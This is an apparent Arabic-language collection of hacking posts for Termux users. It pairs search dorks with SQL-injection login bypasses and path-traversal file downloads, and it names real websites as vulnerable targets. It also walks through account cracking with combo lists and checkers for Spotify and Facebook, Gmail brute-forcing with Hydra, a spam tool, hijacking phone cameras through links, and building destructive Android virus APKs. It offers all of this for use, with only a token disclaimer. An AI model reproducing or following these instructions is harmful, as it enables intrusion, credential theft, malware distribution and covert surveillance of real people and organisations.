الدورك    intext:"ISPROJEK"


بعدها العثور علي لوحه التحكم


راح يكون اليوزر و الباس تبعهم


user: ' or 1=1 limit 1 -- -+

 password: ' or 1=1 limit 1 -- -+


الثاني



الدورك

filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php






الدورك
inurl:"index.php?mnu=login"


الاستخدام

/ index.php?mnu=admin


الدورك

intext:"Powered by iyiWebSitesi"


الاستخدام

لوحه التحكم


testpage.com/admin
sql bypass
 id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#


#cs

 ثغرة   PHPMiniAdmin 1.9 Database Open No-Secure Exploit


الدورك   

inurl:phpminiadmin.php


الاستغلال


https://site.com/salon/db/phpminiadmin.php



#CS

ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure


الدورك 
inurl:''/index.php?option=com_rsfirewall''


أو


 inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net


أو

intext:Designed by Artilabio



الاستغلال


ممكن نسحب اللسته تبع الباسورد

/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


أو الوصول لقاعدة  البيانات

/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql

 /administrator/components/com_rsfirewall/sql/mysql/configuration.sql


/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql


/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql


 /administrator/components/com_rsfirewall/

وغيرها من القواعد


مثال


www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt



#CS

السلام عليكم ورحمة الله وبركاته

شرقي اليوم كيفيه  تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
  سهل جداا
سنتحتاج الي اداتين هما 
الاتشكر والكومبو البريفيت
 
اولا قم بفتح termux  

اولا علينا تثبيت أداة الكومبو وظيفتها  استخراج  كومبو من التيرمكس

اوامرها
 

pkg install php git -y



git clone https://github.com/Juni0r007/PasTerm.git



cd PasTerm

chmod +x *

php pasterm.php

راح تفتح معك الأداة

و بعدها
راح يطلب لك تكتب key word راح تنسخ
 الموجود بالأسفل و تلصقه علي termux

 
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com


و بعدها راح يقول لك اكتب اسم لهذة اللسته
  انا كتبت saja

و بعدها راح يطلع لك مسار التم الاحتفاظ به

مثل هذا

/data/data/com.termux/files/home/saja.txt


كذا انتهينا من الأداة الاولي و تم استخراج للسته
 قويه من والكومبو


راح بندا الجزء الثاني و هو  تثبيت اداة اتشكر الاكونتات

 نفتح صفحه جديدة و نكتب الأوامر التاليه


 
1- rm -rif  PasTerm
apt update&&apt upgrade -y

2-termux-setup-storage

3- pkg install php git -y


4- git clone https://github.com/Juni0r007/AIOChk.git


5- ls


6- cd AIOChk


7- chmod +x *


8- php aio.php



و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد

راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا

/data/data/com.termux/files/home/saja.txt

 و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها

استمتعوووو

(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)


#CS

# اسم الثغرة : Joomla com_admin Components from V2.5.4 to V3.7.4
Database Backup Arbitrary File Download Vulnerability



# الدورك
   inurl:''/administrator/components/com_admin/sql/''
# نوع الثغرة   متوسطة
#################################################################################################

# مسار لوحه التحكم :

/administrator

#################################################################################################

# الاستغلالات  :



/joomla/administrator/components/com_admin/sql/others/mysql/......

/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......

/PATH/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/postgresql/.......

/administrator/components/com_admin/sql/updates/sqlazure/......

/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql

/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql

/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql

#################################################################################################

# أمثلة لمواقع مصابة  =>

[+]
xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql

[+]



#CS

الاسم : SO-AT Solution CMS Bypass SQL Login


الدورك  inurl:/coop/re_register.php


الاستغلال


/coop/adminlogon.php



User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+



أمثلة

 http://healthcoop.or.th/coop/adminlogon.php



 http://www.tot-coop.com/coop/adminlogon.php



#CS

الاسم    Server Info

الدورك

inurl:"debug/default/view?panel=config"


راح تطلع لك مواقع كثيرة

مجرد ما تدخل لها راح يعطيك معلومات
وايضا اسم المستخدم وكلمة المرور

#CS

ثغرة  (FTP2FTP ( Arbitrary File Download :
الدورك  
: inurl:/download2.php?id=
—
الاستغلال


http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
مثال


http://www.supersat.cz/download/azbox/download2.php?id=23

after exploit :

http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================



#CS

السلام عليكم ورحمة الله وبركاته
شرحي اليوم شوي بسيط
وهو تحميل مقطع من الفيس بوك

عن طريق أداة Facebook-Video-Downloader


الأوامر


git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader

cd Facebook-Video-Downloader

php fb.php

enter URL for example (https://www.facebook.com/cctvcom/videos/1410869539034155/)

بعدها ح يطلب اسم للملف حقك
مثلا انا اخترت rubics



#CS

السلام عليكم ورحمة الله وبركاته
أداة TM-scanner رائعه تحتوي الكثير من الأدوات و طريقه استخدمها

الأوامر


git clone https://github.com/TechnicalMujeeb/TM-scanner

cd TM-scanner

chmod +x * sh install.sh

python2 tmscanner.py


#CS

Get Proxy 💯👌
😀

1⃣ apt update
2⃣ apt upgrade
3⃣ pkg install python2
4⃣ pkg install git
5⃣ git clone https://github.com/siruidops/proxy
6⃣ cd proxy
7⃣ pip install -r requirements.txt
8⃣ python2 proxy.py


#CS

Upload shell & SQLi :
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~

مثال

http://[target]/assets/images/profile_pics/your shell.phtml
——————————————

#CS

أداة Spammer

$ apt update && apt upgrade -y

$ pkg install git php -y

$ git clone https://github.com/MaulanaRyM/Spammer

$ cd Spammer

$ php spammer.php

#CS

اداة hacktronian

مميزات الاداة

Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation


اوامر تثبيت الاداة


$ pkg install git

$ pkg install python

$ git clone https://github.com/thehackingsage/hacktronian.git

$ cd hacktronian

$ chmod +x hacktronian.py

$ python2 hacktronian.py


#CS

اداة saycheese

وظيفتها التحكم ب اي كاميرا هاتف عبر link


$ pkg update

$ pkg install git

$ pkg install wget

$ pkg install curl

$ pkg install php

$ pkg install openssh

$ git clone https://github.com/thelinuxchoice/saycheese.git

$ ls

$ cd saycheese

$ ls

$ chmod +x saycheese.sh

$ ls

$ bash saycheese.sh

You IP Address View $ ifconfig

#CS

معرفه معلومات معينه لشخص بتويتر


$ apt update

$ apt install nodejs

$ npm install -global twifo-cli

$ twifo ..... ( Seach Twitter username and name)

#CS

اقدم لكم اداة || VirusCrafter || اداه جديده وقويه لصنع تطبيقات الفيروس على شكل برامج اندرويد هذه الفيروسات خطيره انتبهوا بعد القيام بصناعتها تثبيتها بجهازكم الاندرويد منها فورمات ومنها حرق المعالج ومنها سحب رصيد الجوال
( 18 ) فيروس APK بالاداه



$ pkg install python2

$ pkg install wget

$ pkg install figlet

$ gem install lolcat

$ git clone https://github.com/herp1337/VirusCrafter.git

$ cd VirusCrafter

$ python2 ViruzCrafter.py

📋 ملاحظه مهمه :
بعد الانتهاء من صنع الفيروس توجه الى ملفاتي بجهازك sdcard وراح تلاقي تطبيق الفيروس هناك .. الاداه لاتحتاج نقل الفيروس من termux الى sdcard ( ملفاتي ) يتم نقلها اوتوماتيكيا الى sdcard

#CS

اداة hacktronian

مميزات الاداة


{1}--Information Gathering
{2}--Password Attacks
{3}--Wireless Testing
{4}--Exploitation Tools
{5}--Sniffing & Spoofing
{6}--Web Hacking
{7}--Private Web Hacking
{8}--Post Exploitation
{0}--Install The HACKTRONIAN
{99}-Exit

الاوامر

Termux:
Website hacking and testing
💢 install few tool 💢

Installation in Android :

Open Termux

pkg install git

pkg install python

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x hacktronian.py

python2 hacktronian.py
و بعدها اختر ما تشاء


#CS

امر مميز لي تخمين كلمات مرور gmail
و هي hydra
اولا تجهيز للسته من كلمات المرور wordlist
عن طريق
nano wordlist.txt

و بعدها نثبت الحزمه
pkg install hydra -y

و بعدها نكتب

 hydra -l  yourmail@gmail.com -P yourwordlist.txt -s 465 -S -v -V -t 1 smtp.gmail.com smtp 


#CS

كتابة اسمك علي termux

1 git clone https://github.com/Bhai4You/Termux-Banner

2 cd Termux-Banner

3 chmod +x requirement.sh

4 chmod +x t-ban.sh

5 bash requirement.sh

6 bash t-ban.sh


#CS